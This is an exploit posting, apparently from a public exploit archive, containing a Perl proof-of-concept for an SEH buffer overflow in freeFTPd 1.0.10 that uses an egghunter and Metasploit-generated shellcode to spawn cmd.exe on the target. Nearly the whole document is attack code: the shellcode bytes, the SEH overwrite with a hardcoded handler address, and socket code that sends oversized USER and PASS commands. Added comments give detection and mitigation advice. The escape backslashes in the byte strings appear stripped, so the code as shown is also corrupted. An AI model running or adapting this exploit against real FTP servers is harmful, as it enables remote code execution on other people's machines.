freeFTPd 1.0.10 Buffer Overflow
Posted on 22 August 2013
#!/usr/bin/perl
# freeFTPd 1.0.10 anonymous-auth PASS SEH buffer overflow
# PoC by Wireghoul - www.justanotherhacker.com
# Date: 20130820
# Tested on: XPSP3
# Similar exploits:
# EDB 23079 1330 1339
# Greetz corelan, TecR0C, mr_me, jjkakakk
#
# Defender's reading of this PoC (what the script below actually sends):
#  - Two separate connections are opened to the same host:port.
#  - The first sends a USER command whose argument is the marker
#    "WRGLWRGL" followed by the encoded payload ("egg").
#  - The second logs in as "anonymous" and sends a PASS argument of
#    roughly 1 KB: 0x90 filler, the egghunter stub, a four-byte SEH
#    overwrite, then 209 bytes of "X" padding.
# Detection: FTP USER/PASS arguments several hundred bytes long, or
# containing non-printable bytes, are not produced by normal clients and
# are a strong indicator for this class of attack, especially when they
# follow an anonymous login on the same session.
# Mitigation: the overwrite depends on a handler address inside
# freeFTPDService.exe, which the author notes is the only module without
# SafeSEH, and on an anonymous account existing ("Must be an existing
# anonymous account"); a SafeSEH-protected build or disabling anonymous
# access removes a precondition. Keep the service patched.

# NOTE(review): this is a bare string expression, not a print, so the
# usage text is never shown before exit.
if (scalar(@ARGV) != 2) { "Usage $0 host port "; exit; }

use IO::Socket::INET;

# Null byte in ppr forces a backwards short jump allowing 128 bytes shellcode max
# Thus we use an egghunter
my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8". "WRGL". "x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

# I expect the max length for this is ~1024 bytes, didn't bother checking
# Spawn cmd.exe from msfpayload windows/exec CMD=cmd.exe R | msfencode -b 'x0ax0d' -t perl
my $shell = "xd9xebxd9x74x24xf4x5exbfxe0xddxfbx11x33xc9" .
"xb1x32x31x7ex1ax83xc6x04x03x7ex16xe2x15x21" .
"x13x98xd5xdaxe4xfbx5cx3fxd5x29x3ax4bx44xfe" .
"x49x19x65x75x1fx8axfexfbxb7xbdxb7xb6xe1xf0" .
"x48x77x2dx5ex8ax19xd1x9dxdfxf9xe8x6dx12xfb" .
"x2dx93xddxa9xe6xdfx4cx5ex83xa2x4cx5fx43xa9" .
"xedx27xe6x6ex99x9dxe9xbex32xa9xa1x26x38xf5" .
"x11x56xedxe5x6dx11x9axdex06xa0x4ax2fxe7x92" .
"xb2xfcxd6x1ax3fxfcx1fx9cxa0x8bx6bxdex5dx8c" .
"xa8x9cxb9x19x2cx06x49xb9x94xb6x9ex5cx5fxb4" .
"x6bx2ax07xd9x6axffx3cxe5xe7xfex92x6fxb3x24" .
"x36x2bx67x44x6fx91xc6x79x6fx7dxb6xdfxe4x6c" .
"xa3x66xa7xfax32xeaxd2x42x34xf4xdcxe4x5dxc5" .
"x57x6bx19xdaxb2xcfxd5x90x9ex66x7ex7dx4bx3b" .
"xe3x7exa6x78x1axfdx42x01xd9x1dx27x04xa5x99" .
"xd4x74xb6x4fxdax2bxb7x45xb9xa6x23x48x58x41" .
"xc9x94";

# The egg goes out on its own connection ($eggsock below), separate from
# the anonymous login / PASS connection.
my $egg = "USER WRGLWRGL$shell ";
my $usr = "USER anonymous "; # Must be an existing anonymous account

# I'm lazy, NOPs are fine by me
my $pre = "PASS " . "x90" x (797 - length($egghunter)) . $egghunter;
my $seh1 = "x90x90xEBx80"; # nop, nop, jmp+4
my $seh2 = "xf0x42x41x00"; # PPR from freeFTPDService.exe (only unsafe SEH module), 0x004142f0
my $pad = "X" x 209 ." ";
# Oversized PASS argument: filler + egghunter + SEH overwrite + padding.
my $payload = $pre . $seh1 . $seh2 . $pad;

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect! 
";
my $eggsock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect! ";
print $eggsock $egg;
sleep 1;
print $sock $usr;
sleep 1;
print "Preparing exploit ";
sleep 1;
print $sock $payload;
print "Exploiting ";
sleep 3;
print "Done ";
